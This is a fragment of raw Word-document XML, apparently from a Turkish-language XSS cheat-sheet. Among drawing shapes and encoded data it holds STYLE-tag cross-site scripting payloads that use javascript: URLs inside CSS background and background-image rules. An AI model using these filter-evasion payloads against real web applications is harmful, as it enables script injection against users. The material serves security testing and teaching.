                            <a:ext cx="437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&lt;STYLE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TYPE="text/javascript"&gt;alert('XSS');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&lt;/STYLE&gt;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0" o:spid="_x0000_s1650" style="position:absolute;margin-left:80.7pt;margin-top:12.7pt;width:218.7pt;height:9.15pt;z-index:-15618048;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,254" coordsize="437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">
                <v:shape id="Freeform 782" o:spid="_x0000_s1651" style="position:absolute;left:1614;top:254;width:4374;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="437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g5Wr8A&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPPU/DMBDdkfofrKvERh0YaBTqVhUVFUuHFBa2U3zY&#10;UeNzZLtp+PfcgMT49L43uzkMaqKU+8gGHlcVKOIu2p6dgc+Pt4caVC7IFofIZOCHMuy2i7sNNjbe&#10;uKXpXJySEM4NGvCljI3WufMUMK/iSCzcd0wBi8DktE14k/Aw6KeqetYBe5YGjyO9euou52uQ3lPi&#10;47H9OuVDrh15167LNBtzv5z3L6AKzeVf/Od+twbWtcyXM3IE9PY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ODlavwAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93bnJl&#10;di54bWxQSwUGAAAAAAQABAD1AAAAhAMAAAAA&#10;" path="m4353,183l21,183r-3,-1l,162r,-4l,22,21,,4353,r21,22l4374,162r-18,20l4353,183xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="4353,437;21,437;18,436;0,416;0,412;0,276;21,254;4353,254;4374,276;4374,416;4356,436;4353,437" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 781" o:spid="_x0000_s1652" type="#_x0000_t202" style="position:absolute;left:1614;top:254;width:437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o11sYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UVvDUbe1CbuhGRCkJBGuPB42v2&#10;mSzJvo3ZVdN/3y0Uehxm5htmuRptJ240eONYwTRJQRBXThuuFRzL7fMChA/IGjvHpOCbPKzyx4cl&#10;ZtrduaDbIdQiQthnqKAJoc+k9FVDFn3ieuLond1gMUQ51FIPeI9w28mXNJ1Ji4bjQoM9bRqq2sPV&#10;KlifuHg3l/3XZ3EuTFm+pvwxa5WaPI3rNxCBxvAf/mvvtIL5Ygq/Z+IRk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o11s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&lt;STYLE</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="9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TYPE="text/javascript"&gt;alert('XSS');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&lt;/STYLE&gt;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1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:spacing w:before="102"/>
        <w:ind w:left="154"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>STYLE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Tag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using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Background-image</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10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9894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161290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4652645" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="776" name="Group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52645" cy="116205"/>
                          <a:chOff x="1614" y="254"/>
                          <a:chExt cx="7327" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="777" name="Freeform 779"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="253"/>
                            <a:ext cx="7327" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8920 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 7327"/>
                              <a:gd name="T2" fmla="+- 0 436 254"/>
                              <a:gd name="T3" fmla="*/ 436 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 7327"/>
                              <a:gd name="T6" fmla="+- 0 436 254"/>
                              <a:gd name="T7" fmla="*/ 436 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 7327"/>
                              <a:gd name="T10" fmla="+- 0 436 254"/>
                              <a:gd name="T11" fmla="*/ 436 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 7327"/>
                              <a:gd name="T14" fmla="+- 0 415 254"/>
                              <a:gd name="T15" fmla="*/ 415 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 7327"/>
                              <a:gd name="T18" fmla="+- 0 412 254"/>
                              <a:gd name="T19" fmla="*/ 412 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 7327"/>
                              <a:gd name="T22" fmla="+- 0 275 254"/>
                              <a:gd name="T23" fmla="*/ 275 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 7327"/>
                              <a:gd name="T26" fmla="+- 0 254 254"/>
                              <a:gd name="T27" fmla="*/ 254 h 183"/>
                              <a:gd name="T28" fmla="+- 0 8920 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 7327"/>
                              <a:gd name="T30" fmla="+- 0 254 254"/>
                              <a:gd name="T31" fmla="*/ 254 h 183"/>
                              <a:gd name="T32" fmla="+- 0 8941 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 7327"/>
                              <a:gd name="T34" fmla="+- 0 275 254"/>
                              <a:gd name="T35" fmla="*/ 275 h 183"/>
                              <a:gd name="T36" fmla="+- 0 8941 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 7327"/>
                              <a:gd name="T38" fmla="+- 0 415 254"/>
                              <a:gd name="T39" fmla="*/ 415 h 183"/>
                              <a:gd name="T40" fmla="+- 0 8923 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 7327"/>
                              <a:gd name="T42" fmla="+- 0 436 254"/>
                              <a:gd name="T43" fmla="*/ 436 h 183"/>
                              <a:gd name="T44" fmla="+- 0 8920 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 7327"/>
                              <a:gd name="T46" fmla="+- 0 436 254"/>
                              <a:gd name="T47" fmla="*/ 43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327" h="183">
                                <a:moveTo>
                                  <a:pt x="730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306" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7327" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7327" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7309" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="730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Text Box 778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3"/>
                            <a:ext cx="73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&lt;STYLE&gt;.XSS{background-image:url("javascript:alert('XSS')");}&lt;/STYLE&gt;&lt;A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CLASS=XSS&gt;&lt;/A&gt;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7" o:spid="_x0000_s1653" style="position:absolute;margin-left:80.7pt;margin-top:12.7pt;width:366.35pt;height:9.15pt;z-index:-15617536;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,254" coordsize="73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">
                <v:shape id="Freeform 779" o:spid="_x0000_s1654" style="position:absolute;left:1614;top:253;width:7327;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="73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8iCccA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3WrCQBSE7wt9h+UUvKsbpTUa3YS2ElBaCv6At4fs&#10;MUmbPRuyW41v7wpCL4eZ+YZZZL1pxIk6V1tWMBpGIIgLq2suFex3+fMUhPPIGhvLpOBCDrL08WGB&#10;ibZn3tBp60sRIOwSVFB53yZSuqIig25oW+LgHW1n0AfZlVJ3eA5w08hxFE2kwZrDQoUtfVRU/G7/&#10;jAI8zA4v4/f9up19fr2a5SX/ib9zpQZP/dschKfe/4fv7ZVWEMcx3M6EIy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PIgnHAAAA3AAAAA8AAAAAAAAAAAAAAAAAmAIAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACMAwAAAAA=&#10;" path="m7306,182l21,182r-3,l,161r,-3l,21,21,,7306,r21,21l7327,161r-18,21l7306,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="7306,436;21,436;18,436;0,415;0,412;0,275;21,254;7306,254;7327,275;7327,415;7309,436;7306,436" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 778" o:spid="_x0000_s1655" type="#_x0000_t202" style="position:absolute;left:1614;top:253;width:73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XsbMMA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhO8zdQddKuNpcgGwmCsdgePz+a1&#10;DTYvtcm0+++Xw2DHj+93lk+2FzcavXGsYLVMQBDXThtuFXxVb4/PIHxA1tg7JgU/5CHfzR4yTLW7&#10;c0m3Y2hFDGGfooIuhCGV0tcdWfRLNxBHrnGjxRDh2Eo94j2G214+JclaWjQcGzocaN9RfTl+WwXF&#10;ictXc/04f5ZNaarqJeH39UWpxXwqtiACTeFf/Oc+aAWbTVwbz8Q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XsbM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&lt;STYLE&gt;.XSS{background-image:url("javascript:alert('XSS')");}&lt;/STYLE&gt;&lt;A</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="19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CLASS=XSS&gt;&lt;/A&gt;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1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="Balk2"/>
      </w:pPr>
      <w:r>
        <w:t>STYLE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Tag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Background</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="10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69945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161290</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4667885" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="773" name="Group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885" cy="116205"/>
                          <a:chOff x="1614" y="254"/>
                          <a:chExt cx="7351" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="774" name="AutoShape 776"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="253"/>
                            <a:ext cx="7351" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 8260 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 7351"/>
                              <a:gd name="T2" fmla="+- 0 272 254"/>
                              <a:gd name="T3" fmla="*/ 272 h 183"/>
                              <a:gd name="T4" fmla="+- 0 8256 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 7351"/>
                              <a:gd name="T6" fmla="+- 0 263 254"/>
                              <a:gd name="T7" fmla="*/ 263 h 183"/>
                              <a:gd name="T8" fmla="+- 0 8248 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 7351"/>
                              <a:gd name="T10" fmla="+- 0 257 254"/>
                              <a:gd name="T11" fmla="*/ 257 h 183"/>
                              <a:gd name="T12" fmla="+- 0 8239 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 7351"/>
                              <a:gd name="T14" fmla="+- 0 254 254"/>
                              <a:gd name="T15" fmla="*/ 254 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1632 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 7351"/>
                              <a:gd name="T18" fmla="+- 0 255 254"/>
                              <a:gd name="T19" fmla="*/ 255 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1624 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 7351"/>
                              <a:gd name="T22" fmla="+- 0 259 254"/>
                              <a:gd name="T23" fmla="*/ 259 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1617 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 7351"/>
                              <a:gd name="T26" fmla="+- 0 266 254"/>
                              <a:gd name="T27" fmla="*/ 266 h 183"/>
                              <a:gd name="T28" fmla="+- 0 1614 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 7351"/>
                              <a:gd name="T30" fmla="+- 0 275 254"/>
                              <a:gd name="T31" fmla="*/ 275 h 183"/>
                              <a:gd name="T32" fmla="+- 0 1614 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 7351"/>
                              <a:gd name="T34" fmla="+- 0 415 254"/>
                              <a:gd name="T35" fmla="*/ 415 h 183"/>
                              <a:gd name="T36" fmla="+- 0 1617 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 7351"/>
                              <a:gd name="T38" fmla="+- 0 424 254"/>
                              <a:gd name="T39" fmla="*/ 424 h 183"/>
                              <a:gd name="T40" fmla="+- 0 1624 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 7351"/>
                              <a:gd name="T42" fmla="+- 0 431 254"/>
                              <a:gd name="T43" fmla="*/ 431 h 183"/>
                              <a:gd name="T44" fmla="+- 0 1632 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 7351"/>
                              <a:gd name="T46" fmla="+- 0 435 254"/>
                              <a:gd name="T47" fmla="*/ 435 h 183"/>
                              <a:gd name="T48" fmla="+- 0 8239 1614"/>
                              <a:gd name="T49" fmla="*/ T48 w 7351"/>
                              <a:gd name="T50" fmla="+- 0 436 254"/>
                              <a:gd name="T51" fmla="*/ 436 h 183"/>
                              <a:gd name="T52" fmla="+- 0 8248 1614"/>
                              <a:gd name="T53" fmla="*/ T52 w 7351"/>
                              <a:gd name="T54" fmla="+- 0 433 254"/>
                              <a:gd name="T55" fmla="*/ 433 h 183"/>
                              <a:gd name="T56" fmla="+- 0 8256 1614"/>
                              <a:gd name="T57" fmla="*/ T56 w 7351"/>
                              <a:gd name="T58" fmla="+- 0 427 254"/>
                              <a:gd name="T59" fmla="*/ 427 h 183"/>
                              <a:gd name="T60" fmla="+- 0 8260 1614"/>
                              <a:gd name="T61" fmla="*/ T60 w 7351"/>
                              <a:gd name="T62" fmla="+- 0 418 254"/>
                              <a:gd name="T63" fmla="*/ 418 h 183"/>
                              <a:gd name="T64" fmla="+- 0 8260 1614"/>
                              <a:gd name="T65" fmla="*/ T64 w 7351"/>
                              <a:gd name="T66" fmla="+- 0 275 254"/>
                              <a:gd name="T67" fmla="*/ 275 h 183"/>
                              <a:gd name="T68" fmla="+- 0 8965 1614"/>
                              <a:gd name="T69" fmla="*/ T68 w 7351"/>
                              <a:gd name="T70" fmla="+- 0 272 254"/>
                              <a:gd name="T71" fmla="*/ 272 h 183"/>
                              <a:gd name="T72" fmla="+- 0 8960 1614"/>
                              <a:gd name="T73" fmla="*/ T72 w 7351"/>
                              <a:gd name="T74" fmla="+- 0 263 254"/>
                              <a:gd name="T75" fmla="*/ 263 h 183"/>
                              <a:gd name="T76" fmla="+- 0 8953 1614"/>
                              <a:gd name="T77" fmla="*/ T76 w 7351"/>
                              <a:gd name="T78" fmla="+- 0 257 254"/>
                              <a:gd name="T79" fmla="*/ 257 h 183"/>
                              <a:gd name="T80" fmla="+- 0 8944 1614"/>
                              <a:gd name="T81" fmla="*/ T80 w 7351"/>
                              <a:gd name="T82" fmla="+- 0 254 254"/>
                              <a:gd name="T83" fmla="*/ 254 h 183"/>
                              <a:gd name="T84" fmla="+- 0 8315 1614"/>
                              <a:gd name="T85" fmla="*/ T84 w 7351"/>
                              <a:gd name="T86" fmla="+- 0 255 254"/>
                              <a:gd name="T87" fmla="*/ 255 h 183"/>
                              <a:gd name="T88" fmla="+- 0 8306 1614"/>
                              <a:gd name="T89" fmla="*/ T88 w 7351"/>
                              <a:gd name="T90" fmla="+- 0 259 254"/>
                              <a:gd name="T91" fmla="*/ 259 h 183"/>
                              <a:gd name="T92" fmla="+- 0 8300 1614"/>
                              <a:gd name="T93" fmla="*/ T92 w 7351"/>
                              <a:gd name="T94" fmla="+- 0 266 254"/>
                              <a:gd name="T95" fmla="*/ 266 h 183"/>
                              <a:gd name="T96" fmla="+- 0 8297 1614"/>
                              <a:gd name="T97" fmla="*/ T96 w 7351"/>
                              <a:gd name="T98" fmla="+- 0 275 254"/>
                              <a:gd name="T99" fmla="*/ 275 h 183"/>
                              <a:gd name="T100" fmla="+- 0 8297 1614"/>
                              <a:gd name="T101" fmla="*/ T100 w 7351"/>
                              <a:gd name="T102" fmla="+- 0 415 254"/>
                              <a:gd name="T103" fmla="*/ 415 h 183"/>
                              <a:gd name="T104" fmla="+- 0 8300 1614"/>
                              <a:gd name="T105" fmla="*/ T104 w 7351"/>
                              <a:gd name="T106" fmla="+- 0 424 254"/>
                              <a:gd name="T107" fmla="*/ 424 h 183"/>
                              <a:gd name="T108" fmla="+- 0 8306 1614"/>
                              <a:gd name="T109" fmla="*/ T108 w 7351"/>
                              <a:gd name="T110" fmla="+- 0 431 254"/>
                              <a:gd name="T111" fmla="*/ 431 h 183"/>
                              <a:gd name="T112" fmla="+- 0 8315 1614"/>
                              <a:gd name="T113" fmla="*/ T112 w 7351"/>
                              <a:gd name="T114" fmla="+- 0 435 254"/>
                              <a:gd name="T115" fmla="*/ 435 h 183"/>
                              <a:gd name="T116" fmla="+- 0 8944 1614"/>
                              <a:gd name="T117" fmla="*/ T116 w 7351"/>
                              <a:gd name="T118" fmla="+- 0 436 254"/>
                              <a:gd name="T119" fmla="*/ 436 h 183"/>
                              <a:gd name="T120" fmla="+- 0 8953 1614"/>
                              <a:gd name="T121" fmla="*/ T120 w 7351"/>
                              <a:gd name="T122" fmla="+- 0 433 254"/>
                              <a:gd name="T123" fmla="*/ 433 h 183"/>
                              <a:gd name="T124" fmla="+- 0 8960 1614"/>
                              <a:gd name="T125" fmla="*/ T124 w 7351"/>
                              <a:gd name="T126" fmla="+- 0 427 254"/>
                              <a:gd name="T127" fmla="*/ 427 h 183"/>
                              <a:gd name="T128" fmla="+- 0 8965 1614"/>
                              <a:gd name="T129" fmla="*/ T128 w 7351"/>
                              <a:gd name="T130" fmla="+- 0 418 254"/>
                              <a:gd name="T131" fmla="*/ 418 h 183"/>
                              <a:gd name="T132" fmla="+- 0 8965 1614"/>
                              <a:gd name="T133" fmla="*/ T132 w 7351"/>
                              <a:gd name="T134" fmla="+- 0 275 254"/>
                              <a:gd name="T135" fmla="*/ 27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351" h="183">
                                <a:moveTo>
                                  <a:pt x="6646" y="21"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6646" y="18"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6643" y="12"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6642" y="9"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6637" y="5"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6634" y="3"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6628" y="1"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6625" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="21" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="1"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12" y="3"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="10" y="5"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5" y="9"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3" y="12"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1" y="18"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="158"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1" y="164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3" y="170"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="5" y="173"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="10" y="177"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="12" y="179"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="18" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="21" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6625" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6628" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6634" y="179"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6637" y="177"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6642" y="173"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6643" y="170"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6646" y="164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6646" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6646" y="21"/>
                                </a:lnTo>
                                <a:close/>
                                <a:moveTo>
                                  <a:pt x="7351" y="21"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="7351" y="18"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7348" y="12"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7346" y="9"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7342" y="5"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7339" y="3"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7333" y="1"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7330" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6704" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6701" y="1"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6695" y="3"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6692" y="5"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6688" y="9"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6686" y="12"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6684" y="18"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6683" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6683" y="158"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6683" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6684" y="164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6686" y="170"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6688" y="173"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6692" y="177"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6695" y="179"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6701" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="6704" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7330" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7333" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7339" y="179"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7342" y="177"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7346" y="173"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7348" y="170"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7351" y="164"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7351" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="7351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Text Box 775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3"/>
                            <a:ext cx="735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&lt;STYLE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type="text/css"&gt;BODY{background:url("javascript:alert('XSS')")}&lt;/STYLE&gt;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3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&lt;STYLE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4" o:spid="_x0000_s1656" style="position:absolute;margin-left:80.7pt;margin-top:12.7pt;width:367.55pt;height:9.15pt;z-index:-15617024;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,254" coordsize="735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">
                <v:shape id="AutoShape 776" o:spid="_x0000_s1657" style="position:absolute;left:1614;top:253;width:7351;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="735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ruzMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPzWrDMBCE74W+g9hCb7XcYOriRgkhkOJeCokDvS7W&#10;1jaxVq6l+idPHwUCOQ4z8w2zXE+mFQP1rrGs4DWKQRCXVjdcKTgWu5d3EM4ja2wtk4KZHKxXjw9L&#10;zLQdeU/DwVciQNhlqKD2vsukdGVNBl1kO+Lg/dreoA+yr6TucQxw08pFHL9Jgw2HhRo72tZUng7/&#10;RkHOP/PfmHxvdTMXn186lW44D0o9P02bDxCeJn8P39q5VpCmCVzPhCMgV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Ku7MxQAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABAD1AAAAigMAAAAA&#10;" path="m6646,21r,-3l6643,12r-1,-3l6637,5r-3,-2l6628,1,6625,,21,,18,1,12,3,10,5,5,9,3,12,1,18,,21,,158r,3l1,164r2,6l5,173r5,4l12,179r6,2l21,182r6604,l6628,181r6,-2l6637,177r5,-4l6643,170r3,-6l6646,161r,-140xm7351,21r,-3l7348,12r-2,-3l7342,5r-3,-2l7333,1,7330,,6704,r-3,1l6695,3r-3,2l6688,9r-2,3l6684,18r-1,3l6683,158r,3l6684,164r2,6l6688,173r4,4l6695,179r6,2l6704,182r626,l7333,181r6,-2l7342,177r4,-4l7348,170r3,-6l7351,161r,-140xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="6646,272;6642,263;6634,257;6625,254;18,255;10,259;3,266;0,275;0,415;3,424;10,431;18,435;6625,436;6634,433;6642,427;6646,418;6646,275;7351,272;7346,263;7339,257;7330,254;6701,255;6692,259;6686,266;6683,275;6683,415;6686,424;6692,431;6701,435;7330,436;7339,433;7346,427;7351,418;7351,275" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 775" o:spid="_x0000_s1658" type="#_x0000_t202" style="position:absolute;left:1614;top:253;width:735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RD8sYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT2vCQBTE74V+h+UVvNVNC/5p6kakKAhCaUwPPb5m&#10;n8mS7NuYXTV+e7dQ8DjMzG+YxXKwrThT741jBS/jBARx6bThSsF3sXmeg/ABWWPrmBRcycMye3xY&#10;YKrdhXM670MlIoR9igrqELpUSl/WZNGPXUccvYPrLYYo+0rqHi8Rblv5miRTadFwXKixo4+aymZ/&#10;sgpWP5yvzfHz9ys/5KYo3hLeTRulRk/D6h1EoCHcw//trVYwm03g70w8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+RD8s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&lt;STYLE</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="7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type="text/css"&gt;BODY{background:url("javascript:alert('XSS')")}&lt;/STYLE&gt;</w:t>
                        </w:r>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Lucida Console"/>
                            <w:color w:val="36454E"/>
                            <w:spacing w:val="13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&lt;STYLE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7"/>
        <w:rPr>
          <w:sz w:val="3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3950335" cy="116205"/>
                <wp:effectExtent l="5715" t="7620" r="6350" b="0"/>
                <wp:docPr id="770" name="Group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0335" cy="116205"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6221" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="771" name="Freeform 77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221" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="*/ 6200 w 6221"/>
                              <a:gd name="T1" fmla="*/ 182 h 183"/>
                              <a:gd name="T2" fmla="*/ 21 w 6221"/>
                              <a:gd name="T3" fmla="*/ 182 h 183"/>
                              <a:gd name="T4" fmla="*/ 18 w 6221"/>
                              <a:gd name="T5" fmla="*/ 182 h 183"/>
